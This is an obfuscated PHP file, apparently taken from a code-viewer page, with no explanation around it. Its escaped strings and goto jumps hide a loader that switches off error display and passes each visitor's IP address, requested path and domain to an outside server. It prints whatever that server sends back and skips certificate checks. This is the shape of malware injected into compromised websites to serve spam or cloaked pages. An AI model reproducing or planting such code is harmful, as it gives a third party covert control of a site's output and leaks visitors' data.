1
2
|
<?php goto Koaoh; s9APu: function getIP() { if (getenv("\110\124\x54\120\x5f\x43\114\111\x45\x4e\124\x5f\x49\120") && strcasecmp(getenv("\x48\x54\x54\x50\x5f\103\x4c\x49\x45\x4e\x54\x5f\x49\120"), "\x75\x6e\153\x6e\x6f\167\x6e")) { $ip = getenv("\110\124\x54\120\137\103\x4c\x49\105\x4e\x54\x5f\x49\120"); } elseif (getenv("\110\124\124\x50\x5f\130\137\x46\117\122\127\101\122\104\x45\x44\x5f\106\x4f\122") && strcasecmp(getenv("\110\124\124\120\x5f\x58\x5f\x46\x4f\122\x57\x41\122\104\105\x44\x5f\x46\x4f\122"), "\165\x6e\x6b\x6e\x6f\x77\156")) { $ip = getenv("\110\x54\124\120\137\x58\x5f\106\117\122\x57\101\x52\104\x45\104\137\106\117\x52"); } elseif (getenv("\122\105\x4d\x4f\124\105\137\101\104\x44\x52") && strcasecmp(getenv("\x52\x45\115\x4f\124\105\137\101\x44\104\122"), "\165\x6e\x6b\156\157\x77\x6e")) { $ip = getenv("\x52\105\115\117\124\x45\x5f\x41\104\104\122"); } elseif (isset($_SERVER["\x52\x45\x4d\x4f\124\105\137\x41\104\x44\x52"]) && $_SERVER["\x52\x45\115\x4f\124\105\137\x41\x44\x44\x52"] && strcasecmp($_SERVER["\122\105\115\x4f\x54\x45\x5f\101\x44\104\122"], "\x75\x6e\153\x6e\157\x77\156")) { $ip = $_SERVER["\122\x45\x4d\117\x54\105\137\x41\104\x44\122"]; } return preg_match("\x2f\x5b\134\x64\134\56\135\173\67\54\x31\x35\175\57", $ip, $matches) ? $matches[0] : ''; } goto VPtVX; BVE6H: function getUrlHead($url, $header = '') { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_TIMEOUT, 30); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER["\110\x54\124\x50\x5f\125\x53\105\x52\137\x41\x47\105\x4e\x54"]); curl_setopt($curl, CURLOPT_REFERER, @$_SERVER["\110\124\x54\x50\137\x52\105\x46\x45\x52\x45\x52"]); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); if ($header) { curl_setopt($curl, CURLOPT_HTTPHEADER, $header); } $data = curl_exec($curl); curl_close($curl); return $data; } goto s9APu; Koaoh: try { ini_set("\x64\x69\163\160\x6c\141\x79\x5f\145\162\x72\x6f\x72\163", "\x6f\146\x66"); error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $Remote_server = "\150\164\164\160\x73\72\x2f\x2f\x70\x61\x61\56\141\141\x66\x64\56\x74\x76\57\x70\x68\x70\x34\x30\x34\56\160\150\x70"; $header_curl = array("\165\163\x65\x72\x5f\x61\147\x65\156\x74\72" . $_SERVER["\110\124\124\120\137\x55\123\x45\x52\x5f\x41\x47\x45\x4e\x54"]); $domain = isset($_SERVER["\110\x54\x54\120\137\130\x5f\x46\117\122\x57\101\122\104\x45\104\137\x48\117\x53\124"]) ? $_SERVER["\110\x54\124\120\x5f\x58\x5f\x46\x4f\122\x57\x41\122\104\x45\104\137\110\x4f\x53\124"] : (isset($_SERVER["\x48\124\124\120\x5f\110\117\x53\x54"]) ? $_SERVER["\110\124\124\x50\x5f\110\x4f\x53\x54"] : ''); $file = isset($_SERVER["\x52\105\121\125\105\x53\124\137\x55\x52\111"]) && $_SERVER["\x52\105\121\x55\x45\x53\124\137\125\122\111"] != '' ? $_SERVER["\122\x45\x51\x55\x45\123\x54\137\125\x52\x49"] : $_SERVER["\110\124\124\120\x5f\130\x5f\122\x45\x57\122\x49\124\105\137\x55\122\x4c"]; $geturl = $Remote_server . "\77\x69\x70\75" . getIP() . "\x26\x66\151\x6c\145\x3d" . $file . "\x26\x64\x6f\155\x61\151\x6e\x3d" . $domain; $Content_mb = getUrlHead($geturl, $header_curl); echo $Content_mb; die; } catch (Exception $exception) { } goto BVE6H; VPtVX: ?>
|